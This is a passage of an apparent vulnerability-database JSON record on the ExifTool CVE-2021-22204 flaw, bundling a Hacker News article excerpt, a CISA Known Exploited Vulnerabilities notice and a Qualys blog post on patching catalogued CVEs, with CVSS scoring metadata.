VirusTotal](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgEhezW6T852Ei69pDtF3_i7j5Rdphi57DuUlDmouFjPhDEPj3yJL4iifHt9hQ_surgYplF_uoBPvlGUnrg9Y11McXa5331O5nsqq9eGtcgWoY1RcYZ9WMvF-x8uvq1Y4X1cTmty5Ky9pM0Gu4Q6dLB7L9xAa_ECzBZsUsJ3X3jcp4-lZFIVZjWgyBd/s728-e1000/vt-2.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgEhezW6T852Ei69pDtF3_i7j5Rdphi57DuUlDmouFjPhDEPj3yJL4iifHt9hQ_surgYplF_uoBPvlGUnrg9Y11McXa5331O5nsqq9eGtcgWoY1RcYZ9WMvF-x8uvq1Y4X1cTmty5Ky9pM0Gu4Q6dLB7L9xAa_ECzBZsUsJ3X3jcp4-lZFIVZjWgyBd/s728-e100/vt-2.jpg>)\n\nTo be noted, the vulnerability doesn't affect VirusTotal and in a statement shared with The Hacker News, Bernardo Quintero, its founder, confirmed that it's the intended behavior and that the code executions are not in the platform itself but in the third-party scanning systems that analyze and execute the samples. The company also said it's using a version of ExifTool that's not vulnerable to the flaw. \n\nCysource said it responsibly reported the bug through Google's Vulnerability Reward Programs ([VRP](<https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html>)) on April 30, 2021, following which the security weakness was immediately rectified.\n\nThis is not the first time the ExifTool flaw emerged as a conduit to achieve remote code execution. Last year, GitLab fixed a critical flaw ([CVE-2021-22205](<https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html>), CVSS score: 10.0) related to an improper validation of user-provided images, leading to arbitrary code execution.\n\n_**Update**: The story has been revised based on a statement from VirusTotal to clarify the nature of the exploitation._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-25T20:00:00", "type": "thn", "title": "Researchers Takeover Unpatched 3rd-Party Antivirus Sandboxes via VirusTotal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2022-04-26T08:30:44", "id": "THN:01284F0D93C66B65A40DE129C767426B", "href": "https://thehackernews.com/2022/04/researchers-report-critical-rce.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:29:28", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), which require remediation from federal civilian executive branch (FCEB) agencies by December 1, 2021. CISA has evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise. \n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n[CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>) | Exiftool Remote Code Execution vulnerability | 12/01/2021 \n[CVE-2021-40449](<https://nvd.nist.gov/vuln/detail/CVE-2021-40449>) | Microsoft Win32k Elevation of Privilege | 12/01/2021 \n[CVE-2021-42292](<https://nvd.nist.gov/vuln/detail/CVE-2021-42292>) | Microsoft Excel Security Feature Bypass | 12/01/2021 \n[CVE-2021-42321](<https://nvd.nist.gov/vuln/detail/CVE-2021-42321>) | Microsoft Exchange Server Remote Code Execution | 12/01/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/cisa-adds-four-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-40449", "CVE-2021-42292", "CVE-2021-42321"], "modified": "2022-01-25T00:00:00", "id": "CISA:D12090E3D1C36426271DE8458FFF31E4", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

ExifTool vulnerable to arbitrary code execution

Description

Affected Software

Related